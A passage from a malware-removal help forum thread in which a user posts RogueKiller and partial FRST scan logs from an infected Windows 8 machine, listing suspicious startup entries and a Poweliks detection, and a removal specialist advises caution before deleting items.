[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | {eaab0735-f4dd-2c20-e526-c77a5339bc54} : "C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Xohokebonien : "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Oxveroifbav : "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ezymkuzoawcy : C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Fuoxcoy : C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ozotovihulipa : "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Alldworks : C:\Users\RaRWolf\AppData\Local\Alldworks\msiexec.exe [-] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Abzworks : C:\Windows\SysWOW64\regsvr32.exe C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ecvtion : regsvr32.exe C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Odheyqvau : C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [-] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Okfylaigkiepqul : C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | {eaab0735-f4dd-2c20-e526-c77a5339bc54} : "C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Xohokebonien : "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Oxveroifbav : "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ezymkuzoawcy : C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Fuoxcoy : C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ozotovihulipa : "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Alldworks : C:\Users\RaRWolf\AppData\Local\Alldworks\msiexec.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Abzworks : C:\Windows\SysWOW64\regsvr32.exe C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ecvtion : regsvr32.exe C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Odheyqvau : C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [-] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows NT\CurrentVersion\Windows | Load : C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com [x] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows NT\CurrentVersion\Windows | Load : C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com  -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RzMaelstromVADStreamingService ("C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe") -> Not selected
[Hidden.From.SCM] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnlockerDriver5 -> Deleted
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\xhunter1 (\??\C:\Windows\xhunter1.sys) -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\RzMaelstromVADStreamingService ("C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe") -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\xhunter1 (\??\C:\Windows\xhunter1.sys) -> Not selected
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Not selected
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Not selected
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Deleted
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] a9df0cc7b6bc49c83aac31658ba13be0
[BSP] fd850d89370382cc02cf66d2152e921f : Empty MBR Code
Partition table:
0 - [XXXXXX] UNKNOWN (0x0) [VISIBLE] Offset (sectors): 1 | Size: 2097152 MB
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
 
============================================
RKreport_SCN_10232014_175125.log


#8 Naathim


Posted 23 October 2014 - 05:02 PM

You shouldn't pick the Delete option unless advised; it is good to know where to shoot before pulling the trigger.

Please re-run FRST, make sure that the Addition option is checked, and run Scan. Post the two log files generated.

Radek Naathim Pawelczyk

Malware Removal Specialist

 



#9 RaRWolf


Posted 23 October 2014 - 05:38 PM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 22-10-2014
Ran by RaRWolf (administrator) on SHOOBLEDOOBLE on 23-10-2014 18:28:23
Running from C:\Users\RaRWolf\Downloads
Loaded Profile: RaRWolf (Available profiles: RaRWolf)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Wacom Technology, Corp.) C:\Windows\System32\Wacom_Tablet.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Flux Software LLC) C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(AIMP DevTeam) C:\Music\AIMP3\AIMP3.exe
() C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(The PHP Group) C:\Games\Running With Rifles\tools\php\php-win.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ASUS Ai Charger] => C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe [547984 2012-08-13] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUS Easy Update] => C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe [195200 2012-05-24] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe [3405696 2012-06-25] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [2984688 2012-09-14] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-02-20] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [296520 2014-08-01] (RealNetworks, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585560 2014-06-23] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [3802448 2014-09-04] (LogMeIn Inc.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Dxtory Update Checker 2.0] => C:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe [93696 2010-10-17] (Dxtory Software)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [MurGee.com Auto Clicker] => C:\Program Files (x86)\Auto Clicker\AutoClicker.exe [90440 2013-08-15] (MurGee.com)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [f.lux] => C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [uTorrent] => C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-16] (BitTorrent Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\ChatApplet.exe [11233088 2014-08-01] (Razer Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [GoogleChromeAutoLaunch_0174F854A725FE2A1C6FD2A6E7F56180] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Odheyqvau] => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [306301 2014-10-05] ()
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {052c3cd4-0787-11e4-bef9-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {0531270f-9781-11e3-bedd-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {10709a9d-09d0-11e3-bec3-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c2790a-f6d3-11e2-beb7-3085a9a720f7} - "V:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27936-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27938-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {1fd923c8-bc33-11e3-bee5-3085a9a720f7} - "M:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {204b18f3-c014-11e3-bee6-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218680d2-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218684f4-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224231d1-c503-11e2-be9f-3085a9a720f7} - "G:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224233b8-c503-11e2-be9f-3085a9a720f7} - "D:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239be-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239c6-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {27e8eeda-466e-11e4-bf02-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2656c-2f40-11e4-bf02-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265cd-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265d3-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2668f-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5225a7b0-262b-11e3-beca-3085a9a720f7} - "G:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5fb8944e-6f5a-11e3-bed8-3085a9a720f7} - "W:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382182-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382315-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {669ae025-c999-11e2-be9f-3085a9a720f7} - "V:\LaunchBFII.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca72ec-0943-11e3-bec1-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7318-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7333-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {7675d3a1-2dd6-11e3-becb-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81542b50-c6b0-11e3-bee8-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {81b30cb5-ce51-11e3-beea-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {88bc3d74-e828-11e2-beb3-3085a9a720f7} - "V:\setup.exe" /autorun
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c3f59-14a9-11e4-befb-3085a9a720f7} - "W:\gods2.0.0.1.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c4780-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48b7-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
